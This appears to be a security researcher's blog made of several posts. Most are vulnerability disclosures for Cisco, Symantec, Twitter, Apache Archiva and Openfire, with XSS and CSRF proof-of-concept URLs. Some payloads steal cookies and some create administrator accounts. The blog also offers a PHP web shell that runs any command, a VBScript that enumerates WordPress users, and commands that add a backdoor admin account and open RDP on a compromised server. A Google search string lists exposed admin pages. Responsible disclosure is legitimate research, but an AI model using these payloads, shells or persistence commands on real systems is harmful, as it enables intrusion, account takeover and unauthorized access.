Multiple Vulnerabilities with the Cisco Developer Network

I found a bunch of vulnerabilities with Cisco subdomains a couple of weeks ago, some of them were plain old XSS vulnerabilities,while others were more interesting. Cisco is yet to fix some of them which I will not be talking about here, however I will discuss the other issues that I found and which have now been fixed.

I found an XSS on the developer.cisco.com domain, and since Cisco uses Single Sign On for most of its subdomains, an attacker could simply exploit this issue and gain access to the user accounts under other Cisco domains. The Cisco Developer Network runs on a well known product, which is actively maintained by the developers and used worldwide by several major corporations. 

For the noobs, An XSS or Cross Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (,”,/> etc..). So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.

XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user’s browser using automated frameworks like BeEF and download and execute exploits on the victim’s computer.

The other issue I found was particularly interesting because the application failed to check necessary user privilege levels while a user attempted access to application modules that were obviously sensitive. To this effect, I was able to locate the administration modules of several key sections under developer.cisco.com that would have allowed me to upload files, change and delete the content that users would see. I had access to all available administrative tasks since the application was clearly not checking whether I had admin or guest privileges. To make things worse, Google had traversed and cached these pages which would allow an attacker to reach to all the administration modules following an advanced Google search.


Now that both the issues have been fixed, here’s a finer look at the vulnerabilities:

1. XSS in the Cisco Developer Network (developer.cisco.com)
The following pages accept client side input via the ‘_153_keywords’ parameter and render it back to the browser without sanitization.

This was a POST based XSS, hence to craft an attack vector, an attacker would need to create a page that autosubmits a form on page/body. 
 





2. Insufficient privilege/permission check on the Cisco Developer Network.
The application did not verify the permission levels of logged in users when providing access to the administration modules of several sections listed on http://developer.cisco.com/web/cdc/tech under “Available Technology Centers”


Some examples were: 

  • http://developer.cisco.com/web/cupapi/admin
  • http://developer.cisco.com/web/telesched/administration


An advanced Google search, like the following, can get a list of modules that were  vulnerable:
https://www.google.co.in/search?q=site:developer.cisco.com/web/%20inurl:admin%20|%20inurl:administration

Waiting for Cisco to fix some other issues on several other domains before I disclose them here. Till then Happy Hacking!

XSS vulnerabilities in Symantec websites

A couple of weeks ago, while doing some research for a paper I have been working on, I found two XSS vulnerabilities with the Symantec Learning Management System (symlms.symantec.com) and Enterprise Support Login Page (seer.entsupport.symantec.com). An XSS or Cross Site Scripting vulnerability occurs when an application accepts user input and sends it back to the browser without removing/encoding malicious characters. Malicious characters are any set of characters that a browser can use to render HTML or script content (,”,/> etc..). So, instead of displaying the user input, the browser will render/execute it depending on whether the input was HTML tagged content or script content.

XSS can cause a lot of serious problems. An attacker can steal cookies, redirect users to fake or malicious sites, control a user’s browser using automated frameworks like BeEF and download and execute exploits on the victim’s computer.


On an average, it is easy to find XSS vulnerabilities on the Internet, but finding an XSS issue on a website that is owned and administered by a security services company is quite something. I reported both the vulnerabilities as soon as I discovered them and the security team at Symantec were quite appreciative and welcoming with my disclosures.


Now that both the issues have been fixed, here’s a finer look at the vulnerabilities:


1. XSS in the Symantec Learning Management System (symlms.symantec.com)
The page at https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp accepts client side input via the ‘ru’ hidden parameter and renders it back to the browser without sanitization.

An attack vector could be crafted on the lines of:

  • https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=a%27/%3E%3Ch1%20onmousemove=javascript:alert%28document.cookie%29%3ETEST%3C/h1%3E

  • https://symlms.symantec.com/sumtotal/lang-en/SYS_login.asp?ru=tester%27%3E%3Ciframe%20src=%22http://www.wikipedia.org%22%20width=600%20height=1000%3E%3C/iframe%3E

 






2. XSS in the Enterprise Support Login Page (seer.entsupport.symantec.com)
The page at http://seer.entsupport.symantec.com/downloads/export.asp accepts client side input via the ‘username’, ‘useremail’ and ‘userphone’ parameters and renders it back to the browser without sanitization.

An attack vector could be crafted on the lines of:

  • http://seer.entsupport.symantec.com/downloads/export.asp?username=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
  • http://seer.entsupport.symantec.com/downloads/export.asp?useremail=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
  • http://seer.entsupport.symantec.com/downloads/export.asp?userphone=test%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

Input sanitization and output encoding user input can provide protection. There are several libraries that actually make it easier for developers to create web applications without worrying too much about threats like XSS. The OWASP ESAPI library is something that comes to my mind when I find XSS anywhere.

A couple of more interesting disclosures lined up for June. Till then Happy Hacking!

Twitter Wipe Addressbook CSRF Vulnerability

I disclosed a CSRF vulnerability with Twitter, that could allow a malicious attacker to wipe the address book of an unsuspecting user. I reported the vulnerability in the beginning of March and they fixed it on the 22nd! I wouldn’t want to comment on the process and internal business logic that they follow, but honestly that was a a pretty long period for them to come up with a fix.

Anyways, getting to the vulnerability, the issue was that a user could delete his own address book with a single click URL, which is alright as long as the user wishes to do so himself. However, with the server not verifying whether the request was sent by the user himself or was the user was tricked into sending the request, the application allowed an attacker to generate a request on behalf of a logged in user from the user’s browser and perform the action (deletion of the address book).

The normal process would be as follows:
1. A user logs into mobile.twitter.com
2. If he wants to delete ALL his previously imported contacts, he would click on “Remove Contacts” under Settings.
3. Upon clicking, a GET request is sent to “https://mobile.twitter.com/settings/wipe_addressbook”
4. A message is presented that the the user’s contacts have been removed.

An attacker could take advantage of the absence of any security tokens (CSRF tokens) that would allow the server to authenticate the request and setup a page (and host it on xyz.com/index.html) similar to the following:

An attacker could then be made to navigate to xyz.com/index.html (via email or some other means) and his address book would be deleted!
 

The form that would make the final request has now been protected with a ‘authenticity_token’ which is random and changes on every login and without which the request is not processed on the server. An attacker would need to know this value to attack the application via CSRF.



This was my ticket to the Twitter Hall of Fame for Security researchers at http://twitter.com/about/security!




Installing Aircrack-ng on Ubuntu 12.04

One of the primary reasons I use Ubuntu is to crack wireless networks whenever I get the opportunity. I recently moved to Ubuntu 12.04 and found that aircrack-ng was NOT in the repository.

In the process of compiling aircrack-ng from source, I hit a lot of errors mostly to do with a variable called –Werror. This is what you need to do to compile aircrack-ng without the pesky errors.

sudo apt-get install build-essential
sudo apt-get install libssl-dev
wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz
tar -zxvf aircrack-ng-1.1.tar.gz
cd aircrack-ng-1.1

In the aircrack-ng-1.1 directory there is a file called common.mak, use your favorite editor to open the file and scroll down till you see the following line:
CFLAGS ?= -g -W -Wall -Werror -O3
Delete the -Werror variable, so that the line now looks like the following. Save and exit.
CFLAGS ?= -g -W -Wall -O3
Run make and make install to get aircrack-ng up and running.

C0C0N 2011 – CTF Walkthrough

I won the recently concluded C0C0N Capture the Flag event at the conference. Here’s the walkthrough for all the levels on slideshare.

C0c0n 2011 CTF Walkthrough [slideshare id=9722200&w=477&h=510&sc=no]

View more documents from riyazwalikar

Enable RDP via Command line

Been extremely busy with loads of work. Anyways, here’s something interesting that I needed to do recently at a customer network to gain access to a server.

I managed to obtain a web application shell to the server and was able to execute commands as Administrator. The Application was running of XAMPP under an administrative accounts, so I was lucky there. But what I needed was GUI access to the desktop because I wanted to compromise another server which was reachable using a custom programmed application running on the server that I had just gained access to. Here’s what I did:



1. Created a user and added it to the local administrators group using these commands:

net user newadmin newpa$$w0rd /add

net localgroup administrators newadmin /add
net user newadmin

2. Used the following commands to enable Remote Desktop and logged in with my credentials:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"

/v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh firewall set portopening TCP 3389

3. Bit off a large chunk of some awesome tasting chicken sandwich, sipped some coffee and then proceeded with the rest of the Penetration Test.

Lot of Penetration Testers, reach this wall at some point during their assessments. Hope this helps some tired soul like me.

Happy Hacking!

Apache Archiva Multiple XSS & CSRF Vulnerabilities

I am honestly surprised at the frequency and places one would find threats like Cross Site Scripting and Cross Site Request Forgery. Although immensely easy to locate and exploit, it can get quite twisted to fix these issues in large applications. Here’s a rundown on another product that was found vulnerable. As part of the vulnerability research that I do with published web applications, I downloaded a copy of Apache’s Archiva 1.3.4 which was the latest published edition on the vendor’s website. Upon examination, there seemed to be several issues with the application that I reported responsibly to the vendor and co-operated in responsible disclosure. Since the cat is now out of the bag, here’s the condensed disclosure document with the exploit code intact.

Title: Multiple XSS & CSRF Vulnerabilities in Apache Archiva 1.3.4
——————————————————————–

Project: Apache Archiva
Severity: High
Versions: 1.3.0 – 1.3.4. The unsupported versions Archiva 1.0 – 1.2.2 are also affected.
Exploit type: Multiple XSS & CSRF
Mitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5
Vendor URL: http://archiva.apache.org/security.html
CVE: CVE-ID-2011-1077, CVE-2011-1026
——————————————————————–

Timeline:
28 February 2011: Vendor Contacted
1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues Assigned.
7 March 2011: CVE-2011-1077 Assigned for XSS Issues.
14 March 2011: Fixes released to selected channels / Found to be insufficient
27 May 2011: Vendor releases v1.3.5
27 May 2011: Vendor releases security disclosure to Bugtraq and FD.
30 May 2011: Exploit details released on Bugtraq & FD
——————————————————————–

Product Description:
Apache Archiva is an extensible repository management software that helps taking care of your own personal or enterprise-wide build artifact repository. It is the perfect companion for build tools such as Maven, Continuum, and ANT.

Archiva offers several capabilities, amongst which remote repository proxying, security access management, build artifact storage, delivery, browsing, indexing and usage reporting, extensible scanning functionality… and many more!
(Source: http://archiva.apache.org/)
——————————————————————–

Vulnerability Details:
XSS: User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

CSRF: These issues allow an attacker to access and use the application with the session of a logged on user. In this case if an administrative account is exploited, total application compromise may be acheived.
An attacker can build a simple html page containing a hidden Image tag (eg: ) and entice the administrator to access the page.
———————————————————————-

Proof of Concept:
Reflected XSS:
http://127.0.0.1:8080/archiva/security/useredit.action?username=testalert(‘xss’)
http://127.0.0.1:8080/archiva/security/roleedit.action?name=%22>alert(‘xss’)
http://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=testalert(‘xss’)
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1alert(‘xss’)&artifactId=1alert(‘xss’)&version=1&repositoryId=internal
http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?legacyArtifactPath.path=testalert(‘xss’)&groupId=testalert(‘xss’)&artifactId=testalert(‘xss’)&version=testalert(‘xss’)&classifier=testalert(‘xss’)&type=testalert(‘xss’)
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?proxyid=testalert(‘xss’)

Persistant (Stored) XSS:
Exploit code: testalert(‘xss’)
http://127.0.0.1:8080/archiva/admin/addRepository.action (Identifier:repository.id, Name:repository.name, Directory:repository.location, Index Directory:repository.indexDir)
http://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoid=

http://127.0.0.1:8080/archiva/admin/editAppearance.action (Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)
http://127.0.0.1:8080/archiva/admin/configureAppearance.action

http://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:name=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId, Version:version, Classifier:classifier, Type:type)
http://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action

http://127.0.0.1:8080/archiva/admin/addNetworkProxy.action (Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host, Port:proxy.port, Username:proxy.username)
http://127.0.0.1:8080/archiva/admin/networkProxies.action

CSRF:
http://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.username=tester123&user.fullName=test&user.email=test%40test.com&user.password=abc&user.confirmPassword=abc
http://127.0.0.1:8080/archiva/security/userdelete!submit.action?username=test
http://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=test&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_addNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSelectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repository+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&submitRolesButton=Submit
http://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&method%3AdeleteContents=Delete+Configuration+and+Contents
http://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&artifactId=1&version=1&repositoryId=snapshots
http://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repositoryGroup.id=csrfgrp
http://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGroupId=test&method%3Adelete=Confirm
http://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action?target=maven2-repository.dev.java.net&source=internal
http://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?target=maven2-repository.dev.java.net&source=snapshots
http://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path=jaxen/jars/jaxen-1.0-FCS-full.jar
http://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&proxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.username=&proxy.password=
http://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?proxyid=myproxy
http://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePattern.action?pattern=**/*.rum&fileTypeId=artifacts
http://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsumers.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentConsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksums&enabledKnownContentConsumers=index-content&enabledKnownContentConsumers=metadata-updater&enabledKnownContentConsumers=repository-purge&enabledKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=validate-checksums
http://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.action?enabledUnprocessedConsumers=update-db-project
http://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.action?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanupConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-present-remove-indexed
———————————————————————


Please update to Archiva 1.3.5, available for download via the vendor’s website.

WordPress UserId & Username Enumeration Exploit/PoC Script

On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.

‘Author: [email protected]
‘User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
‘This script allows an attacker to enumerate wordpress users by
‘querying the value of the parameter ‘author’ using xmlHTTP.

Dim url, sQuery, args, i, max

if wscript.arguments.count < 1 then
wscript.echo “WPEnum – WordPress User Enumeration Script”
wscript.echo “Author: [email protected]
wscript.echo “Insufficient Parameters.”
wscript.echo
wscript.echo “cscript WPEnum.vbs []”
wscript.echo “: A WordPress based website in the form of http://site/”
wscript.echo “:[Optional] Maximum number of users. Default 20.”
wscript.echo “Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10”
wscript.echo
wscript.quit
End if

set args = wscript.Arguments

wscript.echo “WPEnum – WordPress User Enumeration Script”
wscript.echo “Author: [email protected]
wscript.echo
wscript.echo “Enumerating …”
wscript.echo

i=0
max=20
url = args(0)
if right(url,1) “/” then
url = url & “/”
End if

if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
max=args(1)
End if

Set xmlHTTP = Nothing
set xmlHTTP = CreateObject(“Microsoft.XmlHttp”)

For i=1 to max
sQuery = args(0) & “?author=” & i
xmlHTTP.open “GET”, sQuery, false
xmlHTTP.send “”

wscript.sleep 70

do while not xmlHTTP.readyState=4
Loop

if xmlHTTP.status = 404 then
wscript.echo
i=i-1
wscript.echo i & ” users enumerated.”
wscript.echo “Done!”
Set xmlHTTP = Nothing
wscript. quit
End if

wscript.echo “Userid:” & i

k = Instr(Lcase(xmlHTTP.responseText),””)
j = Instr(Lcase(xmlHTTP.responseText),””)
username = Mid(xmlHTTP.responseText, k+7, j-k-7)
wscript.echo username
wscript.echo
Next

wscript.echo i & ” users enumerated.”
wscript.echo “Done!”

Set xmlHTTP = Nothing

‘End of program

Simple PHP Web Application Backdoor

The Hack In the Box CTF PreQuals 2011 had hackers from all over the world rack their brains against a Windows Binary and a Web Application. The challenge was to submit the MD5 sum of a flag either from the binary or from the application server. Somewhere between the night of March 19th and the early morning of March 20th, a group of hackers from India managed to crack the Web Application challenge.

The web application in question was vulnerable to a Local File Inclusion vulnerability. The web server also had its FTP port open and permitted anonymous login and file upload. It was then a matter of time when people who found this started uploading web application shells which would then be called from the application’s home page. A simple Google search will give tons of shells that would allow attackers to do awesome amounts of stuff at the mere click of buttons. Prebuilt commands into the page allow attackers to search for files that are world readable, open reverse connect shells, bind ports to /bin/bash, upload and download files etc. But most of these shells are detected by antivirus software and are flagged malicious. Since I needed a simple execution interface, I decided to write a shell from scratch. Here’s the code:





simple php shell PoC - karniv0re



System Info



<?php
echo "/etc/issue:\t".exec ("cat /etc/issue")."\n";
echo "uname -a:\t".exec ("uname -a")."\n";
echo "id:\t\t".exec("id")."\n";
echo "current wd:\t".exec ("pwd")."\n";
?>

Command Output


<?php
if(isset($_POST['cmd'])){
$cmd = $_POST['cmd'];
if (strlen($cmd)==0){
$cmd = "true";
}
system($cmd);
die;
}
?>

To get a list of users once you have uploaded and gained access to your shell, you can run:

"awk -F ":" '{ print $1 "[" $3 "]" "[" $7 "]"}' /etc/passwd"

Feel free to modify and add features, but remember there are more shells out there doing much more awesome stuff than merely execute and display.

Happy Hacking!

Multiple XSS and XSRF issues in Openfire 3.6.4

I recently (read: last month) disclosed several security issues with Ignite Realtime’s Openfire v3.6.4. The following links are the original advisory postings and the exploit code:
http://www.securityfocus.com/bid/45682
http://secunia.com/advisories/42799
http://packetstormsecurity.org/files/author/8144/
http://www.exploit-db.com/exploits/15918/


The following is the condensed disclosure document for the vulnerabilities.:
Title: Multiple XSS and CSRF Vulnerabilities in Openfire 3.6.4 Administrative Section
——————————————————————–

Project: Openfire
Severity: High
Versions: 3.6.4 (other versions may be affected)
Exploit type: Multiple XSS and CSRF
Fixes Available: None
——————————————————————–

Timeline:
14 October 2010: Vendor Contacted
15 October 2010: Vendor Response received. Asks to verify the issues in beta.
28 October 2010: Informed Vendor that multiple pages are still vulnerable
03 November 2010: Acknowledgement / Update requested
03 November 2010: Update recevied. No fixes initiated.
23 November 2010: Informed vendor disclosure date set to 1/12/2010
22 December 2010: Update requested.
22 December 2010: Vendor asks to release information as the vulnerabilities are already known
23 December 2010: A different contact at the Vendor location informs that there are no updates.
24 December 2010: Disclosure date set to 5 January 2011
05 January 2011: Disclosed to the Security Community via Bugtraq, Full disclosure and Secunia
——————————————————————–

Product Description:
Openfire is a real time collaboration (RTC) server licensed under the Open Source GPL. It uses the only widely adopted open protocol for instant messaging, XMPP (also called Jabber). Openfire is incredibly easy to setup and administer, but offers rock-solid security and performance.
(Source: http://www.igniterealtime.org/projects/openfire/)
——————————————————————–

Affected Files/Locations/Modules:
XSS:
login.jsp
security-audit-viewer.jsp
user-create.jsp
plugins/search/advance-user-search.jsp
user-roster-add.jsp
user-roster.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp
muc-room-edit-form.jsp
muc-room-delete.jsp
plugins/clientcontrol/create-bookmark.jsp
plugins/clientcontrol/spark-form.jsp

CSRF:
user-create.jsp
user-password.jsp
user-delete.jsp
group-create.jsp
group-edit.jsp
group-delete.jsp

———————————————————————

Vulnerability Details:
User can insert HTML or execute arbitrary JavaScript code within the vulnerable application. The vulnerabilities arise due to insufficient input validation in multiple input fields throughout the application.
Successful exploitation of these vulnerabilities could result in, but not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary url redirection, disclosure or modification of sensitive data and phishing attacks.

Since the vulnerabilities exisit in the administrative module, a sucessful attack could cause a complete compromise of the entire application.

An attacker can also force a user into executing functions that add/delete/modify users and groups without the knowledge of the user.
———————————————————————-

Proof of Concept:
Persistent XSS:
http://target-url/login.jsp?url=&username=test” onfocus=javascript:window.location.assign(‘http://www.google.com’);”>

http://target-url/login.jsp?url=hello” onfocus=javascript:window.location.assign(‘http://www.google.com’);”>

http://target-url/security-audit-viewer.jsp?range=15&username=”>alert(‘xss’)&search=Search

http://target-url/user-create.jsp?username=test”>alert(‘xss’)
http://target-url/user-create.jsp?name=test”>alert(‘xss’)
http://target-url/user-create.jsp?email=test”>alert(‘xss’)

http://target-url/plugins/search/advance-user-search.jsp?criteria=test”>alert(‘xss’)

http://target-url/user-roster-add.jsp?username=testalert(‘xss’)
http://target-url/user-roster-add.jsp?username=user&jid=1&nickname=alert(‘XSS’)&email=alert(‘XSS’)&add=Add+Item

http://target-url/user-roster.jsp?username=testalert(document.cookie)
http://target-url/user-lockout.jsp?username=testalert(‘xss’)

http://target-url/group-create.jsp?name=testalert(‘xss’)&description=alert(‘xss’)&create=Create+Group

http://target-url/group-edit.jsp?creategroupsuccess=true&group=testalert(‘xss’)

http://target-url/group-delete.jsp?group=alert(‘xss’)

http://target-url/muc-room-edit-form.jsp?save=true&create=”>alert(‘XSS’)&roomconfig_persistentroom=”>alert(‘XSS’)&roomName=23&mucName=conference&roomconfig_roomname=alert(‘XSS’)&roomconfig_roomdesc=alert(‘XSS’)&room_topic=alert(‘XSS’)&roomconfig_maxusers=”>alert(‘XSS’)&roomconfig_presencebroadcast=alert(‘XSS’)true&roomconfig_presencebroadcast2=”>alert(‘XSS’)&roomconfig_presencebroadcast3=true”>alert(‘XSS’)&roomconfig_roomsecret=”>alert(‘XSS’)&roomconfig_roomsecret2=”>alert(‘XSS’)&roomconfig_whois=moderator”>alert(‘XSS’)&roomconfig_publicroom=true”>alert(‘XSS’)&roomconfig_canchangenick=true”>alert(‘XSS’)&roomconfig_registration=true”>alert(‘XSS’)&Submit=Save+Changes

http://target-url/muc-room-delete.jsp?roomJID=”>alert(‘XSS’)&create=false

http://target-url/plugins/clientcontrol/create-bookmark.jsp?urlName=”>alert(‘XSS’)&url=”>alert(‘XSS’)&users=”>alert(‘XSS’)&groups=”>alert(‘XSS’)&rss=off&createURLBookmark=Create&type=url

http://target-url/plugins/clientcontrol/spark-form.jsp?optionalMessage=alert(‘XSS’)&submit=Update+Spark+Versions

Stored XSS:
http://target-url/group-create.jsp
http://target-url/group-summary.jsp
Method: Navigate to http://target-url/group-create.jsp, and create a new group with the following details.
Group Name: Testalert(“xss”)
Description: Testalert(“xss”)
Click on Create Group, you will be greeted with multiple alert boxes. Click on Group Summary from the left pane or navigate to http://target-url/group-summary.jsp to be greeted again by multiple alert boxes completing the PoC.

CSRF:
For the following links, create html pages with image tags with scr= the following links and ask the user to view these pages. If a user is logged into Openfire’s admin console and the HTML pages are viewed then the respective functions are called:
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User
http://target-url/user-create.jsp?username=tester&name=Riyaz&email=walikarriyazad%40microland.com&password=test&passwordConfirm=test&isadmin=on&create=Create+User>
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password
http://target-url/user-password.jsp?username=admin&password=secure-pass&passwordConfirm=secure-pass&update=Update+Password>
http://target-url/user-delete.jsp?username=tester&delete=Delete+User
http://target-url/user-delete.jsp?username=tester&delete=Delete+User>
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group
http://target-url/group-create.jsp?name=NewGroup&description=New+Group&create=Create+Group>
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add
http://target-url/group-edit.jsp?group=NewGroup&add=Add&username=admin&addbutton=Add>
http://target-url/group-edit.jsp?group=NewGroup&[email protected]&updateMember=Update
http://target-url/group-edit.jsp?group=NewGroup&[email protected]&updateMember=Update>

———————————————————————